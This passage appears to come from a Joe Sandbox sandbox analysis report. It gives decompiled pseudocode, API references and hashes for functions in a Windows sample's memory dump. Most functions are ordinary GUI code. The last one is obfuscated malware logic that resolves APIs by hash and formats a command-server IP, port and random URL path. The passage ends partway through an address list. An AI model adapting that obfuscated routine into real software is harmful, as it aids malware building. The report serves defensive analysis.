Download Yara Rule

C-Code - Quality: 93%

			E0040443F(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, int _a32, intOrPtr _a36, signed int _a40) {
				struct HDC__* _v8;
				int _v12;
				struct HBITMAP__* _v16;
				void* _t111;

				_v8 = CreateCompatibleDC(_a16);
				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
				SelectObject(_v8, _v16);
				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
				_v12 = 0;
				while(1) {
					asm("cdq");
					if(_v12 >= _a28 / _a40 + 1) {
						break;
					}
					StretchBlt(_v8, 0, 0, (_v12 + 1) * _a40, _a32, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
					BitBlt(_a16, _a20, _a24, (_v12 + 1) * _a40, _a32, _v8, 0, 0, 0xcc0020);
					E0040381D(_a36);
					_t111 = _t111 + 4;
					_v12 = _v12 + 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				DeleteObject(_v16);
				DeleteDC(_v8);
				return 1;
			}

APIs

CreateCompatibleDC.GDI32(?), ref: 00404449
CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040445E
SelectObject.GDI32(?,?), ref: 0040446F
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 00404496
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 004044ED
BitBlt.GDI32(00000000,00000000,?,?,?,?,00000000,00000000,00CC0020), ref: 0040451B
BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 00404557
DeleteObject.GDI32(?), ref: 00404561
DeleteDC.GDI32(?), ref: 0040456B

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
String ID:
API String ID: 1300799366-0
Opcode ID: cc5d082e70818b573a522f2b25332a04e89bcefb0093d68fd00deffb3daad7d5
Instruction ID: 5871b13c33776004db1b10881a90cc129f1f9f80c304186c253610c93300aed5
Opcode Fuzzy Hash: cc5d082e70818b573a522f2b25332a04e89bcefb0093d68fd00deffb3daad7d5
Instruction Fuzzy Hash: D84164B6600108AFCB14CF98DD95FEE77B9EB8C744F118258FA09A7294D634ED11CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004046DE, Relevance: 13.6, APIs: 9, Instructions: 120
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004046DE(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, int _a28, signed int _a32, intOrPtr _a36, signed int _a40) {
				struct HDC__* _v8;
				int _v12;
				struct HBITMAP__* _v16;
				void* _t111;

				_v8 = CreateCompatibleDC(_a16);
				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
				SelectObject(_v8, _v16);
				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
				_v12 = 0;
				while(1) {
					asm("cdq");
					if(_v12 >= _a32 / _a40 + 1) {
						break;
					}
					StretchBlt(_v8, 0, 0, _a28, (_v12 + 1) * _a40, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
					BitBlt(_a16, _a20, _a24, _a28, (_v12 + 1) * _a40, _v8, 0, 0, 0xcc0020);
					E0040381D(_a36);
					_t111 = _t111 + 4;
					_v12 = _v12 + 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				DeleteObject(_v16);
				DeleteDC(_v8);
				return 1;
			}

APIs

CreateCompatibleDC.GDI32(?), ref: 004046E8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 004046FD
SelectObject.GDI32(?,?), ref: 0040470E
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 00404735
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 0040478C
BitBlt.GDI32(00000000,00000000,?,?,?,?,00000000,00000000,00CC0020), ref: 004047BA
BitBlt.GDI32(00CC0020,?,?,00000000,?,00000000,?,?,00CC0020), ref: 004047F6
DeleteObject.GDI32(?), ref: 00404800
DeleteDC.GDI32(?), ref: 0040480A

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: CompatibleCreateDeleteObject$BitmapSelectStretch
String ID:
API String ID: 1300799366-0
Opcode ID: 7f207c6eba3032f2a70fab5f487ec57d68f369c1225f3a8e3d09705c4a8ace12
Instruction ID: 516329d77e908a997c244217de3d4d8bb9b87b0cd9461334f0d2af6cacd336f2
Opcode Fuzzy Hash: 7f207c6eba3032f2a70fab5f487ec57d68f369c1225f3a8e3d09705c4a8ace12
Instruction Fuzzy Hash: 6F4174B6600108EBCB04CF98DD95FAE77B9EB8C744F158258FA09A7250D634E9118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00412121, Relevance: 13.6, APIs: 9, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00412121(intOrPtr* __ecx) {
				void* __esi;
				signed int _t40;
				struct HWND__* _t44;
				signed int _t48;
				signed char _t53;
				struct HWND__* _t55;
				struct HINSTANCE__* _t60;
				void* _t62;
				void* _t73;
				intOrPtr* _t77;
				void* _t79;
				void* _t81;

				E00406520(E00429CE8, _t79);
				_t77 = __ecx;
				 *((intOrPtr*)(_t79 - 0x10)) = _t81 - 0x18;
				 *((intOrPtr*)(_t79 - 0x1c)) = __ecx;
				_t73 =  *(__ecx + 0x44);
				 *(_t79 - 0x18) =  *(__ecx + 0x48);
				_t40 = E00424BFB();
				_t60 =  *(_t40 + 0xc);
				if( *(_t77 + 0x40) != 0) {
					_t60 =  *(E00424BFB() + 0xc);
					_t40 = LoadResource(_t60, FindResourceA(_t60,  *(_t77 + 0x40), 5));
					_t73 = _t40;
				}
				if(_t73 != 0) {
					_t40 = LockResource(_t73);
					 *(_t79 - 0x18) = _t40;
				}
				if( *(_t79 - 0x18) != 0) {
					 *(_t79 - 0x14) = E004120A5(_t77);
					E00413C3E();
					__eflags =  *(_t79 - 0x14);
					 *(_t79 - 0x20) = 0;
					if( *(_t79 - 0x14) != 0) {
						_t55 = IsWindowEnabled( *(_t79 - 0x14));
						__eflags = _t55;
						if(_t55 != 0) {
							EnableWindow( *(_t79 - 0x14), 0);
							 *(_t79 - 0x20) = 1;
						}
					}
					_push(_t77);
					 *(_t79 - 4) = 0;
					"VWh\rDB"();
					_t44 = E00411E32(_t77,  *(_t79 - 0x18), E00413740(_t79,  *(_t79 - 0x14)), _t60);
					__eflags = _t44;
					if(_t44 != 0) {
						__eflags =  *(_t77 + 0x24) & 0x00000010;
						if(( *(_t77 + 0x24) & 0x00000010) != 0) {
							_t62 = 4;
							_t53 = E00416528(_t77);
							__eflags = _t53 & 0x00000001;
							if((_t53 & 0x00000001) != 0) {
								_t62 = 5;
							}
							_push(_t62);
							E00415F1B(_t77);
						}
						__eflags =  *(_t77 + 0x1c);
						if( *(_t77 + 0x1c) != 0) {
							E0041663D(_t77, 0, 0, 0, 0, 0, 0x97);
						}
					}
					 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
					__eflags =  *(_t79 - 0x20);
					if( *(_t79 - 0x20) != 0) {
						EnableWindow( *(_t79 - 0x14), 1);
					}
					__eflags =  *(_t79 - 0x14);
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *(_t77 + 0x1c);
						if(__eflags == 0) {
							SetActiveWindow( *(_t79 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t77 + 0x58))();
					E004120DF(_t77, _t77, __eflags);
					_t48 =  *(_t77 + 0x2c);
				} else {
					_t48 = _t40 | 0xffffffff;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t79 - 0xc));
				return _t48;
			}

APIs

__EH_prolog.LIBCMT ref: 00412126
FindResourceA.KERNEL32(?,00000000,00000005), ref: 0041215E
LoadResource.KERNEL32(?,00000000), ref: 00412166

Part of subcall function 00413C3E: UnhookWindowsHookEx.USER32(?), ref: 00413C63

LockResource.KERNEL32(?), ref: 00412173
IsWindowEnabled.USER32(?), ref: 004121A6
EnableWindow.USER32(?,00000000), ref: 004121B4
EnableWindow.USER32(?,00000001), ref: 00412242
GetActiveWindow.USER32 ref: 0041224D
SetActiveWindow.USER32(?), ref: 0041225B

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Window$Resource$ActiveEnable$EnabledFindH_prologHookLoadLockUnhookWindows
String ID:
API String ID: 401145483-0
Opcode ID: 7015d410af779c90a7d9a4b6f66a6dc9d9dc78ce1a3fb9c656cf5ce14bf6b1e4
Instruction ID: 29e84b16fa1c15ce6d6e5a6389cc251cef0e56d6ff14e1849cc81362d4330516
Opcode Fuzzy Hash: 7015d410af779c90a7d9a4b6f66a6dc9d9dc78ce1a3fb9c656cf5ce14bf6b1e4
Instruction Fuzzy Hash: 0841C331A00604AFCB21AF65CA45AEFBBB5FF44715F10011FF502E2291CBB99D91CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041DF9A, Relevance: 13.6, APIs: 9, Instructions: 111
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041DF9A(signed int __ecx) {
				void* _t33;
				void* _t34;
				CHAR* _t41;
				signed int _t42;
				signed int _t43;
				struct HWND__* _t44;
				signed int _t51;
				void* _t53;
				signed int _t62;
				signed int _t73;
				signed int _t75;
				void* _t77;

				E00406520(E0042A610, _t77);
				_push(__ecx);
				_t51 =  *(_t77 + 0xc);
				_t62 = __ecx;
				_t33 = 0x80c83b00;
				 *(_t77 - 0x10) = __ecx;
				 *((intOrPtr*)(__ecx + 0xb0)) = 1;
				if((_t51 & 0x00000004) != 0) {
					_t33 = 0x80c83300;
				}
				_t34 = E00422BCF(_t62, 0, 0, 0x4399a0, _t33, 0x439630,  *((intOrPtr*)(_t77 + 8)), 0);
				if(_t34 != 0) {
					asm("sbb esi, esi");
					_t73 = ( ~(_t51 & 0x00005000) & 0x0000f000) + 0x00002000 | _t51 & 0x00000040;
					_push(GetSystemMenu( *(_t62 + 0x1c), 0));
					_t53 = E00417635();
					DeleteMenu( *(_t53 + 4), 0xf000, 0);
					DeleteMenu( *(_t53 + 4), 0xf020, 0);
					DeleteMenu( *(_t53 + 4), 0xf030, 0);
					DeleteMenu( *(_t53 + 4), 0xf120, 0);
					_t41 =  *0x436980; // 0x436994
					 *(_t77 + 0xc) = _t41;
					 *(_t77 - 4) =  *(_t77 - 4) & 0x00000000;
					_t42 = E00417214(_t77 + 0xc, __eflags, 0xf011);
					__eflags = _t42;
					if(_t42 != 0) {
						DeleteMenu( *(_t53 + 4), 0xf060, 0);
						AppendMenuA( *(_t53 + 4), 0, 0xf060,  *(_t77 + 0xc));
					}
					_t75 =  *(_t77 - 0x10);
					_t43 = E0041D0E3(_t75 + 0xcc,  *((intOrPtr*)(_t77 + 8)), _t73 | 0x50000000, 0xe81f);
					__eflags = _t43;
					if(_t43 != 0) {
						__eflags = _t75;
						if(_t75 != 0) {
							_t44 =  *(_t75 + 0x1c);
						} else {
							_t44 = 0;
						}
						E00413740(_t77, SetParent( *(_t75 + 0xe8), _t44));
						_push(1);
						_pop(0);
					}
					 *(_t75 + 0xb0) =  *(_t75 + 0xb0) & 0x00000000;
					_t27 = _t77 - 4;
					 *_t27 =  *(_t77 - 4) | 0xffffffff;
					__eflags =  *_t27;
					E00416AEC(_t77 + 0xc);
					_t34 = 0;
				} else {
					 *((intOrPtr*)(_t62 + 0xb0)) = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t77 - 0xc));
				return _t34;
			}

APIs

__EH_prolog.LIBCMT ref: 0041DF9F
GetSystemMenu.USER32(?,00000000), ref: 0041E013
DeleteMenu.USER32(?,0000F000,00000000,00000000), ref: 0041E031
DeleteMenu.USER32(?,0000F020,00000000), ref: 0041E03D
DeleteMenu.USER32(?,0000F030,00000000), ref: 0041E049
DeleteMenu.USER32(?,0000F120,00000000), ref: 0041E055
DeleteMenu.USER32(?,0000F060,00000000,0000F011), ref: 0041E07E
AppendMenuA.USER32 ref: 0041E08D
SetParent.USER32(?,?,?,?,0000E81F,0000F011), ref: 0041E0CA

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Menu$Delete$AppendH_prologParentSystem
String ID:
API String ID: 3391233131-0
Opcode ID: e21fefbac9b959bc40e50a7e112f0a59602f04dbb09a707c84792978608cf12c
Instruction ID: 3b28708bc0a1016f049b86d81bab26ae888aa54a77c2c6cf0aff380c6ea48e92
Opcode Fuzzy Hash: e21fefbac9b959bc40e50a7e112f0a59602f04dbb09a707c84792978608cf12c
Instruction Fuzzy Hash: 3431C271740211BBEB309F62CC46F9ABF64EF48714F118126FA09AA1E1C7B8A901CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 004104E7, Relevance: 13.6, APIs: 9, Instructions: 80
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E004104E7(void* __ebx) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				void* __ecx;
				void* __esi;
				struct HWND__* _t28;
				int _t31;
				int _t32;
				int _t34;
				void* _t35;
				void* _t40;
				void* _t41;
				signed int _t43;
				signed int _t52;

				_t40 = __ebx;
				_t52 = _t43;
				E00406330(lstrlenA( *(_t52 + 0x78)) + 1 +  *(_t52 + 0x78), 0,  *((intOrPtr*)(_t52 + 0x7c)) - lstrlenA( *(_t52 + 0x78)) + 1);
				_v8 = GetFocus();
				 *(_t52 + 0x60) = E004120A5(_t52);
				E00413C3E();
				_t28 =  *(_t52 + 0x60);
				if(_t28 != 0 && IsWindowEnabled(_t28) != 0) {
					_push(1);
					_pop(0);
					EnableWindow( *(_t52 + 0x60), 0);
				}
				_push(_t40);
				_t41 = E004249C4();
				if(( *(_t52 + 0x92) & 0x00000008) == 0) {
					_push(_t52);
					"VWh\rDB"();
				} else {
					 *(_t41 + 0x18) = _t52;
				}
				_push(_t52 + 0x5c);
				if( *((intOrPtr*)(_t52 + 0xa8)) == 0) {
					_t31 = GetSaveFileNameA();
				} else {
					_t31 = GetOpenFileNameA();
				}
				 *(_t41 + 0x18) =  *(_t41 + 0x18) & 0x00000000;
				_v8 = _t31;
				if(0 != 0) {
					EnableWindow( *(_t52 + 0x60), 1);
				}
				_t32 = IsWindow(_v12);
				_t64 = _t32;
				if(_t32 != 0) {
					SetFocus(_v12);
				}
				E004120DF(_t52, _t52, _t64);
				_t34 = _v8;
				if(_t34 == 0) {
					_t35 = 2;
					return _t35;
				}
				return _t34;
			}

APIs

lstrlenA.KERNEL32(?), ref: 004104F1
GetFocus.USER32 ref: 0041050C

Part of subcall function 00413C3E: UnhookWindowsHookEx.USER32(?), ref: 00413C63

IsWindowEnabled.USER32(?), ref: 00410535
EnableWindow.USER32(?,00000000), ref: 00410547
GetOpenFileNameA.COMDLG32(?), ref: 00410572
GetSaveFileNameA.COMDLG32(?), ref: 00410579
EnableWindow.USER32(?,00000001), ref: 00410590
IsWindow.USER32(00000000), ref: 00410596
SetFocus.USER32(00000000), ref: 004105A4

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Window$EnableFileFocusName$EnabledHookOpenSaveUnhookWindowslstrlen
String ID:
API String ID: 3606897497-0
Opcode ID: 26475a310f4ed8bf1bdae507504d36e30356123cd70d61a8b284773050b4369f
Instruction ID: cfd9afc9f89d739c60573f6ed008476d2ccbece9f7daf62680160fc279b61255
Opcode Fuzzy Hash: 26475a310f4ed8bf1bdae507504d36e30356123cd70d61a8b284773050b4369f
Instruction Fuzzy Hash: 68219271210700BFD724AF32DC4AB9B7BE9EF44305F04442EF55696292DBB9E8C18B99

Uniqueness

Uniqueness Score: -1.00%

Function 022712B0, Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 396
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E022712B0(char __ecx, signed int __edx, intOrPtr* _a4) {
				char _v2048;
				char _v2560;
				char _v2688;
				char _v2816;
				intOrPtr* _v2820;
				intOrPtr* _v2824;
				char _v2828;
				char _v2836;
				char _v2844;
				signed int _v2848;
				intOrPtr _v2852;
				void* _v2856;
				intOrPtr* _v2860;
				char _v2864;
				intOrPtr _v2868;
				char _v2872;
				intOrPtr* _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				char _v2892;
				intOrPtr* _v2896;
				intOrPtr _v2904;
				intOrPtr* _v2908;
				void* __ebx;
				void* __ebp;
				void* _t117;
				signed int _t118;
				void* _t121;
				intOrPtr _t127;
				intOrPtr* _t139;
				intOrPtr* _t141;
				signed int _t146;
				signed int _t154;
				intOrPtr* _t157;
				intOrPtr* _t159;
				signed int _t163;
				intOrPtr* _t174;
				signed int _t175;
				signed int _t178;
				intOrPtr* _t182;
				void* _t189;
				intOrPtr* _t191;
				intOrPtr* _t194;
				intOrPtr* _t196;
				intOrPtr _t199;
				char _t241;
				signed char* _t243;
				signed int _t263;
				short* _t265;
				void* _t266;
				short* _t267;
				void* _t268;
				void* _t269;
				intOrPtr _t270;
				signed int _t273;
				intOrPtr* _t274;
				void* _t276;
				void* _t277;
				intOrPtr* _t278;
				void* _t280;
				void* _t282;
				void* _t283;
				void* _t284;

				_t280 =  &_v2896;
				_t278 = _v2864;
				_t263 = __edx;
				_v2888 = 0;
				_t241 = __ecx;
				_v2884 = __edx;
				_t196 = _v2860;
				_t117 = 0xa52ba2c;
				_v2892 = __ecx;
				_v2896 = _t196;
				_v2876 = _t278;
				while(1) {
					L1:
					_t191 = _a4;
					goto L2;
					do {
						while(1) {
							L2:
							_t282 = _t117 - 0x1a712fee;
							if(_t282 > 0) {
								break;
							}
							if(_t282 == 0) {
								_t157 =  *0x227dea8;
								__eflags = _t157;
								if(_t157 == 0) {
									_t157 = E02273E80(_t191, E02273F20(0xbb398380), 0x97f883e, _t278);
									 *0x227dea8 = _t157;
								}
								_t268 =  *_t157();
								_t159 =  *0x227e1a0;
								__eflags = _t159;
								if(_t159 == 0) {
									_t159 = E02273E80(_t191, E02273F20(0xbb398380), 0x26c3f343, _t278);
									 *0x227e1a0 = _t159;
								}
								 *_t159(_t268, 0, _v2844);
								_t196 = _v2908;
								_t117 = 0xa9569d6;
								_t241 = _v2904;
								continue;
							} else {
								_t283 = _t117 - 0xa52ba2c;
								if(_t283 > 0) {
									__eflags = _t117 - 0x1194a5ec;
									if(__eflags > 0) {
										__eflags = _t117 - 0x1947423a;
										if(_t117 != 0x1947423a) {
											goto L28;
										} else {
											_t163 = E02271FB0( &_v2872,  &_v2856);
											_t196 = _v2896;
											_t241 = _v2892;
											asm("sbb eax, eax");
											_t117 = ( ~_t163 & 0xd3a4a493) + 0x2ec7d52f;
											continue;
										}
									} else {
										if(__eflags == 0) {
											_t265 =  &_v2560;
											_t194 = _v2880 - (0xaaaaaaab * _v2880 >> 0x20 >> 2) + (0xaaaaaaab * _v2880 >> 0x20 >> 2) * 2 + (0xaaaaaaab * _v2880 >> 0x20 >> 2) + (0xaaaaaaab * _v2880 >> 0x20 >> 2) * 2 + 1;
											__eflags = _t194;
											if(_t194 != 0) {
												do {
													_t273 = (_v2880 & 0x0000000f) + 4;
													E02274ED0(_t265, _t273,  &_v2880);
													_t267 = _t265 + _t273 * 2;
													_t280 = _t280 + 4;
													 *_t267 = 0x2f;
													_t265 = _t267 + 2;
													_t194 = _t194 - 1;
													__eflags = _t194;
												} while (_t194 != 0);
												_t278 = _v2876;
												_t196 = _v2896;
											}
											_t241 = _v2892;
											 *_t265 = 0;
											_t117 = 0x26613761;
											_t263 = _v2884;
											goto L1;
										} else {
											__eflags = _t117 - 0xa9569d6;
											if(_t117 == 0xa9569d6) {
												E02274250(_t191, _v2864);
												_t196 = _v2896;
												_t117 = 0xc5127ed;
												_t241 = _v2892;
												continue;
											} else {
												__eflags = _t117 - 0xc5127ed;
												if(_t117 == 0xc5127ed) {
													L69:
													E02274250(_t191, _t278);
													L70:
													return _v2888;
												} else {
													goto L28;
												}
											}
										}
									}
								} else {
									if(_t283 == 0) {
										_t174 =  *0x227dd4c;
										__eflags = _t174;
										if(_t174 == 0) {
											_t174 = E02273E80(_t191, E02273F20(0xbb398380), 0xae3c1a47, _t278);
											 *0x227dd4c = _t174;
										}
										_t175 =  *_t174();
										_t196 = _v2896;
										_t241 = _v2892;
										_v2880 = _t175;
										_t117 = 0x38f41d46;
										continue;
									} else {
										_t284 = _t117 - 0x3354cb2;
										if(_t284 > 0) {
											__eflags = _t117 - 0x8f8b881;
											if(_t117 != 0x8f8b881) {
												goto L28;
											} else {
												_t178 = E02271950( &_v2844,  &_v2688,  &_v2836);
												_t196 = _v2896;
												_t280 = _t280 + 4;
												_t241 = _v2892;
												asm("sbb eax, eax");
												_t117 = ( ~_t178 & 0x0c54f09a) + 0x1a712fee;
												continue;
											}
										} else {
											if(_t284 == 0) {
												_t269 = E022734C0(0x227d0e0);
												_t182 =  *0x227dc60;
												__eflags = _t182;
												if(_t182 == 0) {
													_t182 = E02273E80(_t191, E02273F20(0xe66945e6), 0xcca28b0d, _t278);
													 *0x227dc60 = _t182;
												}
												 *_t182( &_v2048, 0x400, _t269,  &_v2816,  &_v2688);
												_t280 = _t280 + 0x14;
												E02273460(_t269);
												_t196 = _v2896;
												_t117 = 0x8f8b881;
												_t241 = _v2892;
												continue;
											} else {
												if(_t117 == 0xe50069) {
													E02274250(_t191, _v2856);
													_t196 = _v2896;
													_t117 = 0x2ec7d52f;
													_t241 = _v2892;
													continue;
												} else {
													if(_t117 != 0x26c79c2) {
														goto L28;
													} else {
														 *((intOrPtr*)(_t191 + 4)) =  *_v2856;
														_t270 = E022742F0(_t191,  *_v2856);
														 *_t191 = _t270;
														if(_t270 != 0) {
															_push( *((intOrPtr*)(_t191 + 4)));
															_push(_t270);
															_t189 = E022757E0(_v2852 - 4);
															_t280 = _t280 + 8;
															asm("sbb edi, edi");
															_v2888 =  ~_t263;
															if(0 == _t189) {
																E02274250(_t191,  *_t191);
															}
															_t263 = _v2884;
														}
														_t196 = _v2896;
														_t117 = 0xe50069;
														_t241 = _v2892;
														continue;
													}
												}
											}
										}
									}
								}
							}
							L71:
						}
						__eflags = _t117 - 0x2ec7d52f;
						if(__eflags > 0) {
							__eflags = _t117 - 0x310afd51;
							if(_t117 == 0x310afd51) {
								_v2828 = _t241;
								_v2820 = _t196;
								_v2824 = _t278;
								_t118 = E02271E60( &_v2828,  &_v2864);
								_t196 = _v2896;
								_t241 = _v2892;
								asm("sbb eax, eax");
								_t117 = ( ~_t118 & 0x1deeb958) + 0xc5127ed;
								goto L2;
							} else {
								__eflags = _t117 - 0x3380dca7;
								if(_t117 == 0x3380dca7) {
									_t121 = E022734C0(0x227d080);
									_t274 =  *0x227dc60;
									_t266 = _t121;
									__eflags = _t274;
									if(_t274 == 0) {
										_t274 = E02273E80(_t191, E02273F20(0xe66945e6), 0xcca28b0d, _t278);
										 *0x227dc60 = _t274;
									}
									_t199 =  *0x227e2e0; // 0x4bef38
									_t243 =  *(_t199 + 0xc);
									 *_t274( &_v2816, 0x40, _t266, _t243[3] & 0x000000ff, _t243[2] & 0x000000ff, _t243[1] & 0x000000ff,  *_t243 & 0x000000ff);
									_t280 = _t280 + 0x1c;
									E02273460(_t266);
									_t127 =  *0x227e2e0; // 0x4bef38
									_t196 = _v2896;
									_t263 = _v2884;
									_t241 = _v2892;
									_v2848 =  *( *((intOrPtr*)(_t127 + 0xc)) + 4) & 0x0000ffff;
									_t117 = 0x1194a5ec;
									goto L2;
								} else {
									__eflags = _t117 - 0x38f41d46;
									if(_t117 != 0x38f41d46) {
										goto L28;
									} else {
										_t276 =  *(_t263 + 4) + (0x51eb851f *  *(_t263 + 4) >> 0x20 >> 5) * 4 + (0x51eb851f *  *(_t263 + 4) >> 0x20 >> 5);
										_t278 = E022742F0(_t191, _t276);
										_v2876 = _t278;
										__eflags = _t278;
										if(_t278 == 0) {
											goto L70;
										} else {
											_push(_t276);
											_push(_t278);
											_t196 = E02275BC0( *_t263,  *(_t263 + 4), _t278);
											_t280 = _t280 + 8;
											_v2896 = _t196;
											__eflags = _t196;
											if(_t196 == 0) {
												goto L69;
											} else {
												_t241 = _v2892;
												_t117 = 0x310afd51;
												goto L2;
											}
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t139 =  *0x227dea8;
								__eflags = _t139;
								if(_t139 == 0) {
									_t139 = E02273E80(_t191, E02273F20(0xbb398380), 0x97f883e, _t278);
									 *0x227dea8 = _t139;
								}
								_t277 =  *_t139();
								_t141 =  *0x227e1a0;
								__eflags = _t141;
								if(_t141 == 0) {
									_t141 = E02273E80(_t191, E02273F20(0xbb398380), 0x26c3f343, _t278);
									 *0x227e1a0 = _t141;
								}
								 *_t141(_t277, 0, _v2872);
								_t196 = _v2908;
								_t117 = 0x2be07bd7;
								_t241 = _v2904;
								goto L2;
							} else {
								__eflags = _t117 - 0x2a3fe145;
								if(__eflags > 0) {
									__eflags = _t117 - 0x2be07bd7;
									if(_t117 != 0x2be07bd7) {
										goto L28;
									} else {
										E02274250(_t191, _v2836);
										_t196 = _v2896;
										_t117 = 0x1a712fee;
										_t241 = _v2892;
										goto L2;
									}
								} else {
									if(__eflags == 0) {
										_t146 = E02272290( &_v2864,  &_v2844);
										_t196 = _v2896;
										_t241 = _v2892;
										asm("sbb eax, eax");
										_t117 = ( ~_t146 & 0x28eb72d1) + 0xa9569d6;
										goto L2;
									} else {
										__eflags = _t117 - 0x26613761;
										if(_t117 == 0x26613761) {
											E02271C70( &_v2688);
											_t196 = _v2896;
											_t117 = 0x3354cb2;
											_t241 = _v2892;
											goto L2;
										} else {
											__eflags = _t117 - 0x26c62088;
											if(_t117 != 0x26c62088) {
												goto L28;
											} else {
												_push( &_v2872);
												_v2872 = 0;
												_push( &_v2836);
												_v2868 = 0;
												_push( &_v2048);
												_push( &_v2560);
												_t154 = E02272C20( &_v2816, _v2848);
												_t196 = _v2896;
												_t280 = _t280 + 0x10;
												_t241 = _v2892;
												asm("sbb eax, eax");
												_t117 = ( ~_t154 & 0xed66c663) + 0x2be07bd7;
												goto L2;
											}
										}
									}
								}
							}
						}
						goto L71;
						L28:
						__eflags = _t117 - 0x33f32524;
					} while (_t117 != 0x33f32524);
					return _v2888;
					goto L71;
				}
			}

0x022712b0
0x022712b8
0x022712c0
0x022712c2
0x022712c6
0x022712c8
0x022712cc
0x022712d0
0x022712d5
0x022712d9
0x022712dd
0x022712e1
0x022712e1
0x022712e1
0x022712e8
0x022712f0
0x022712f0
0x022712f0
0x022712f0
0x022712f5
0x00000000
0x00000000
0x022712fb
0x02271589
0x0227158e
0x02271590
0x022715a3
0x022715a8
0x022715a8
0x022715af
0x022715b1
0x022715b6
0x022715b8
0x022715cb
0x022715d0
0x022715d0
0x022715dc
0x022715de
0x022715e2
0x022715e7
0x00000000
0x02271301
0x02271301
0x02271306
0x0227148e
0x02271493
0x02271556
0x0227155b
0x00000000
0x02271561
0x02271569
